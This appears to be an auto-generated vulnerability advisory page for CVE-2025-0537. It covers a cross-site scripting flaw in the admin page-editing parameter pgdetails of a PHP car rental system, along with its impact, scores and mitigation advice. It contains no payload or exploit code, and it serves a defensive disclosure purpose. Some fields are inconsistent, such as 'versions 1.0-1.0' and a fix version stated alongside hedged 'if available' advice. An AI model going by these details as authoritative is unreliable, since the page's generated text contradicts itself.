Platform
php
Component
my-cves
Fixed in
1.0.1
A problematic cross-site scripting (XSS) vulnerability has been identified in code-projects Car Rental Management System, affecting versions 1.0. This flaw allows attackers to inject malicious scripts through manipulation of the pgdetails argument within the /admin/manage-pages.php file. Successful exploitation could lead to session hijacking or defacement of the administrative interface. The vulnerability is fixed in version 1.0.1.
The XSS vulnerability in Car Rental Management System allows an attacker to inject arbitrary JavaScript code into the application. This code will then be executed in the context of the user's browser when they access the affected page. An attacker could leverage this to steal session cookies, redirect users to malicious websites, or modify the content of the page. Given that the vulnerability exists within the /admin/manage-pages.php file, successful exploitation could grant an attacker administrative access to the system, enabling them to modify data, create new users, or perform other unauthorized actions. The impact is amplified if the administrative interface handles sensitive data or controls critical system functions.
This vulnerability has been publicly disclosed, increasing the risk of exploitation. No specific KEV listing or EPSS score is currently available. Public proof-of-concept exploits may emerge, making it easier for attackers to exploit the vulnerability. The CVE was published on 2025-01-17.
Exploit Status
EPSS
0.14% (33% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2025-0537 is to upgrade Car Rental Management System to version 1.0.1 or later, which contains the fix for this vulnerability. If upgrading is not immediately feasible, implement strict input validation and output encoding on the pgdetails parameter within the /admin/manage-pages.php file. Consider using a Web Application Firewall (WAF) with XSS filtering rules to block malicious requests. Regularly review and sanitize user-supplied data to prevent similar vulnerabilities from being introduced in the future.
Update the Car Rental Management System to a version later than 1.0, if available, that fixes the XSS vulnerability in the manage-pages.php file. If no patched version is available, review and filter the inputs of the pgdetails parameter in the manage-pages.php file to prevent the execution of malicious JavaScript code.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2025-0537 is a cross-site scripting (XSS) vulnerability in Car Rental Management System versions 1.0-1.0, allowing attackers to inject malicious scripts via the /admin/manage-pages.php file.
You are affected if you are using Car Rental Management System version 1.0. Upgrade to version 1.0.1 to mitigate the risk.
Upgrade Car Rental Management System to version 1.0.1 or later. Implement input validation and output encoding as a temporary workaround.
The vulnerability has been publicly disclosed, increasing the likelihood of exploitation. Monitor your systems for suspicious activity.
Refer to the code-projects website or relevant security mailing lists for the official advisory regarding CVE-2025-0537.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.